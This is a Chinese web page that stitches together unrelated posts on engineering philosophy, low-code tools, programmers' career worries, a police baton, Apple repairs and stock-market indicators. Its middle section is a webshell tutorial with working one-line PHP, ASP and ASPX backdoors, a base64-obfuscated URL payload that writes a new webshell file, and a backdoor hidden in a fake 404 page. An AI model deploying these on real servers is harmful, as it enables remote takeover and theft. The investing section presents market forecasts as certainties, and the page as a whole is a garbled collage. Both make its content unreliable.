人、技术、过程、工具、质量-“以人为本”的工程哲学-iPerson
人、技术、过程、工具、质量-“以人为本”的工程哲学
工程哲学:以人为本:
市场是人的需求形成的;
产品是给人做的;
项目是人做的;
人能掌握的技术才有实用性;
人能执行的过程才能落地;
人能使用的工具才是好工具。
工程的价值观:五人原则
看人行:看看工程师和用户的真实的工作情况;
知人难:真实的感受他们的难处;
做人事:给他们推荐具有可执行性的流程和任务;
说人话:用大家能够听懂的语言交流。
看到低代码开发我就想到Dreamweaver,当年我初学ASP时,用DW做了个论坛,那时候DW版本还是3.0、4.0。在DW完全可视化的状态下,可以鼓捣出一个完整的,具有互动功能的网站出来。各种元素属性、样式、行为都可以像填写表格一样直观操作。但现在DW已经日薄西山,真正开发环境没有几个人用它了。究其原因,一是可视化操作并不能完全适应千奇百怪的需求,二是可视化*成的代码比较臃肿。虽然它可以在纯代码环境下编写项目,但跟其他集成开发环境相比,它这方面却又显得薄弱。
如今低代码工具和平台忽然兴起,被很多人说成是软件开发的趋势。但我却有些担心,首先他们能做到DW当初的功能和自由度吗?其次即使能比肩DW,能解决DW的天*缺陷吗?从我多年的软件开发经验来看,需求是千变万化的,而且有很多是稀奇古怪的,需要深入代码层面去解决问题。还有就是性能方面的问题,可视化*成的代码肯定比纯手写的代码要臃肿,进而降低运行效率。然后还有扩展性问题,随着项目需求越来越精细化,低代码平台能否持续提供支撑?我觉得现在有些低代码工具和平台可能走错了方向。
目前来看,行业内卷,做PLC调试工作,因目前项目暂停,准备刚好可以通过这段时间来学习,对于asp.net core, blazer ,vue,有些傻傻分不清。今天看了一下前端开发,准备做一下权限管理。
在网上看了需要安装脚手架,原来输入大写的NODE一直不行,重新安装了好几遍,最后才发现要输入小写的,也不知道这样是否就以为着脚手架安装*了。
年纪大了学习有点吃力了。给自己加油,第一步就是要学会做人员权限管理。同时熟悉工具的使用
#轻兵器科普##轻兵器爱好者#新时代更需“老派作风”,FBI换装新型ASP特工甩棍!这种新型甩棍称为A40特工型,收缩时全长只有203毫米,便于携带,通过按钮释放装置,完全伸展后全长可达406毫米。A40的标准版本除钢制打击头外,还采用了铝合金部件以减轻重量,但FBI采购的版本完全由4140钢制成,以增强打击力。该版本还配有弹簧夹,便于放在口袋或腰带中携带,非常适合便衣使用。ASP甩棍和OC喷雾剂、泰瑟枪一起,曾是美国执法部门标配的“非杀伤性”警用武器,最常见的一种轻量型,全重为255克,收缩状态203毫米,完全伸展后533毫米。但近年来ASP和OC喷雾剂一度被视为过时产品。其实ASP除控制暴力事件、驱散人群外,还可以作为撬杠、指示棒以及破窗工具,用途广泛。为此,厂商特意在一份声明中说:“能够继续得到联邦调查局男女特工人员的信任,为他们提供履行职责和保障自身安全所需的设备和培训,这是一种莫大的荣誉。”该公司称,FBI是持续采购更多甩棍的主要联邦机构之一。
奔四程序员,决定再深入学习一次单片机。
我算是比较早的一批程序员了,最早的时候使用ASP、PHP、VB,后来转向c#,最近十来年则是以JAVA、PHP为主。其实小城市程序员真是啥都要干,jQuery、angular、vue、安卓、iOS我也都开发了大量代码。
五六年前我曾自学过一次STM32,并且把学习过程写了一个小系列的博客,当时用STM32最小板学习了串口、GPIO口、RAM和FLASH下载调试等技术。不过实际工作中用不到,学到这里就没坚持下去。上学的时候课程还是8086单片机,更是忘的影都没了。上学时我学的电子专业,电路硬件知识还了解一点皮毛,也做过一些上位机软件,对硬件通讯并不陌*。
明年就是“不惑”的年龄了,作为最早奔四的80后群体,现在之所以决定再次冲击STM32开发技术,还是为了日后的职场多留点后路。我在小城市做程序员,其实没什么核心的科技含量,年龄大了,危机感就愈加强烈。经过仔细观察,我发现小城市互联网从业的技术人员虽然薪资整体待遇比嵌入式略高,但可替代性更强,不从业务出发,只看技术的话,三四十岁程序员和二十多岁优秀的程序员比,根本没什么竞争优势。
而嵌入式整体就业面要更窄,更像在一个小圈子里流动,这个圈子相对来说就略显稳定。
我身边奔四的互联网从业人员,很多就处于尴尬境地,求职工资太高很多公司给不起,工资太低满足不了自己*活,高不成、低不就的状况下,很多程序员干到奔四就走向了自我创业。但创业这事情,真的不是每个人都适合,起码我是没有这个信心。
另外嵌入式的技术迭代速度也没有前端、后端这么疯狂,开发工具升版速度总体来说不高。未来几年国内芯片技术可能迎来一波快速发展时期,早点进入这个行业,看看能不能为未来职场留下更多话语权。
技术角度看,我打算把STM32再学深入一点,在之前学习的基础上,把各种外设通讯、常用传感器的使用都先学一下。这次使用了普中的STM32-F1开发板,资源比起之前最小板丰富不少,还带了一个触摸屏,所以学完基础部分,再学一下基于操作系统的嵌入式开发。
学完这些,再从应用角度切入risc-v单片机系列的学习,正好身边有这资源,集团公司旗下有一个团队做risc-v芯片,最好能想办法进入某个开发项目,这样学以致用效果也更好。
学习方式是视频+动手实践+看书+写博客,之前学STM32时写的博客太粗糙了,这次决心写得更细致一些。
最近一年左右就这么规划了,希望能坚持下来。[加油]
一句话木马原理与攻防
一句话木马原理很简单,造型也很简单,所以造成了它理解起来容易,抵御起来也容易。于是黑白的较量变成了黑帽不断的构造变形的后门,去隐蔽特征,而白帽则不断的更新过滤方法,建起更高的城墙。
一、原理简述
对于不同的语言有不同的构造方法。
基本构造:最开头构造的是脚本开始的标记
核心部分:获取并执行得到的内容,通常类似eval、execute等
被执行内容:一般是http等协议接受的值,通常类似request、$_POST等
如果我们通过客户端向服务器发送被执行内容,那么就会让服务器执行我们发送的脚本,挂马就实现了。
/*asp一句话木马*/<%execute(request("value"))%>
/*php一句话木马*/<?php @eval($_POST[value]);?>
/*aspx一句话木马*/
<%@ Page Language="Jscript"%>
<%eval(Request.Item["value"])%>
黑帽子的目的,就是想尽办法给目标网站插入这么一段会被储存起来的语句。可以是一个单独的脚本文件文件(.asp 、.php、.aspx ),或者是隐藏在某些网页下的文件、代码等。
其中的value 就是客户端要发送的内容,然后通过客户端与服务器建立连接,发送控制脚本。也会涉及到一些任意文件上传漏洞等。
二、简单变形
很明显的 eval 可以成为一个静态特征码,webshell扫描工具可以以此为关键词,扫描到这种木马加以屏蔽。于是可以简单变形不出现eval:
<?php $_GET['a']($_POST['b'])?>
同理,传给a值为 @base64_decode(base64编码过后的eval)。
<?php $_GET['a']($_GET['b']);?>
利用方法:
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
通过对GET请求的URL构造而形成利用,左括号和右括号是URL编码,解码回来如下:
?a=assert&b=${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))};
PHP接收到GET请求后相当于执行一个assert函数,并把b作为assert的参数。b里面使用略php的base64解码函数,把部分信息通过base64编码而绕过扫描,解码后如下:
?a=assert&b=${fputs(fopen(c.php,w),<?php @eval($_POST[c]); ?>1)};
执行后当前目录*成c.php文件并写入一句话木马,这已经算是一个非常隐蔽的木马了。而在PHP 后门的变形之路上,远远不止这些,甚至可以自己定义一个加密解密的函数,或者是利用xor, 字符串翻转,压缩,截断重组等等方法来绕过。
三、变形改良
1.404页面隐藏木马
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
</head>
<body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body>
</html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>
一般404页面放好后,很少有人会定期对404页面进行检查和修改。
如果在404页面挂上了一句话后门,一方面不会被发现,另一方面,黑帽子很容易能定位到并连接上服务器。
详情:网页链接
【#苹果宣布将推出自助维修计划#,网友:为了赚更多】
欧界报道:
11月17日,苹果宣布将推出自助维修计划,这项计划将从iPhone 12 与 iPhone 13 开始。个人消费者与超过 5000 家 Apple 授权服务提供商(AASP)和 2800 家独立维修服务提供商一样可以获取零件、工具与维修手册,进行自助维修。
但是部分网友认为苹果此举是为了赚更多钱。大部分的人都不具备专业的修机技术,很容易把手机修坏,再找苹果专门的维修店,维修的价格会更高。再者,第三方维修点会全面购买 Apple 官方备件,这无疑是为苹果备件供应链打工。不知道对此,你怎么看呢?
通过数据判断行情:
1、 M1-M2增速差
是货币供应量的活化指标,代表资金流向趋势,增速差的走势跟市场行情基本同步,甚至还能提前一点,所以这个指标特别有用。特别是要抓那些大趋势的拐点,当增速差长期向上或向下然后发*转折的时候,市场跟着转势的可能性就非常大,例如2019年市场增速差见底回升,那么股市其实就很有可能回升。还有市场逆增速差而动,比如2017年,市场一路上扬,增速差一路向下,其实这时候风险就比较大了,所以用增速差来判断大势,有着7-8成的胜率。
查M1-M2增速差网站:网页链接
2、 社融周期
社融周期也就是信用周期,社融向上行情不会太差,社融向下,行情不会太好。社融的用法是排除法,逆社融的行情可能不会长久,比如2017年,社融一路向下,到了2018年就出现了下跌。社融这个数据是存量同比数据,2021年9月已经降到10%,基本算是历史最低水平,即将跌破2018年底的9.8%,社融这个指标遵循否极泰来的效应,一旦到底,未来必然出现反弹,2018年就比较明显,一旦社融反弹市场很快就会回来。
而宏观杠杆率也非常重要,一旦听到去杠杆这三个字行情通常表现不会太好,特别是债券也会很糟糕。
3、 PPI和铜价
PPI指标是判断经济强周期的标志,PPI大幅上升,证明未来强周期可能会出现,比PPI更快速的工具是铜价,铜价上升PPI上升强周期未来上升的概率就会非常大,超过80%,所以一旦看到这两个指标上升就应该布局强周期板块,比如有色、钢铁、煤炭、化工,或者宽基中的中证红利指数。
PPI和铜价构筑了一个周期模型,当PPI和铜价飙升时强周期就会出现,如果其中一个指标掉头向下或出现见顶信号就应该注意周期向下的风险。
4、 沪深300指数股息率溢价
资产之间价格关系,通常用的指标是沪深300股息率溢价数据,也就是沪深300的股息率除十年期国债收益率,这是比较股债最基础的逻辑,看谁更有优势,一旦溢价特别低的时候,说明长期看股市投资就没有优势了,预期收益还不如债券。
查看沪深300指数股息率溢价方式:微信-小程序-韭圈-股债性价比-比值-股息率溢价
投资怎么做预测:
1看政策,政策是会对市场进行逆周期调节的,当经济变差的时候,未来政策大概率会干预,比如现在,我们就预测,今年底明年初,政策一定会转向积极,政策不断释放利好,降低资金成本,一定会让市场利率下行,在股债比当中,股市的吸引力会持续提升。所以政策的逆周期变化,是一个比较确定的东西。也是经济预测中,最重要的一个点。
2看情绪,我们经常讲,盈亏同源,繁荣始于衰退,衰退的原因就是繁荣,当市场疯狂之后,必然跟随的就是暴跌,当市场暴跌之后,未来预期回报就会很高。你与其研究什么天干地支阴阳五行,不如把之前的涨跌幅好好看看,像2019和2020年,连涨了两年之后,2021年必然会是一个调整年。当大家都知道买白酒稳赚不陪了,那么白酒就肯定要下跌。当大家都追着买新能源,都去炒煤炭,把价格炒上天之后,那么必然就是崩溃。这种预测的胜率是非常大的。
3才是看周期,看企业利润,看企业库存,看社会融资,说白了也是看企业未来投资的意愿,能反映他们的乐观程度,如果大家都很不乐观,库存很高,业绩一天比一天差,那么股市肯定会有下跌。如果都出清了,库房里没东西可卖了,开始重新*产,进入主动补库存,那么未来业绩就会释放。股市预期也会逐渐上来。
4、看预期回报,未来行情好不好,取决于有多少预期回报比较高的投资标的,如果预期回报很高,能买的东西多,那么第二年行情就差不了。相反如果可买的东西不多,啥都贵了,也没什么确定性的机会,那么第二年很可能就是大跌。比如巴菲特在70年代初期解散了巴菲特合伙公司,就是因为他找不到什么可以投资的东西了。后面连续几年的暴跌,他也就躲过去了。并不是他多能预测,而是策略决定的。当很多东西,都透支了未来几年的回报,都适合卖出,不适合买入的时候,他的仓位自然就下来了。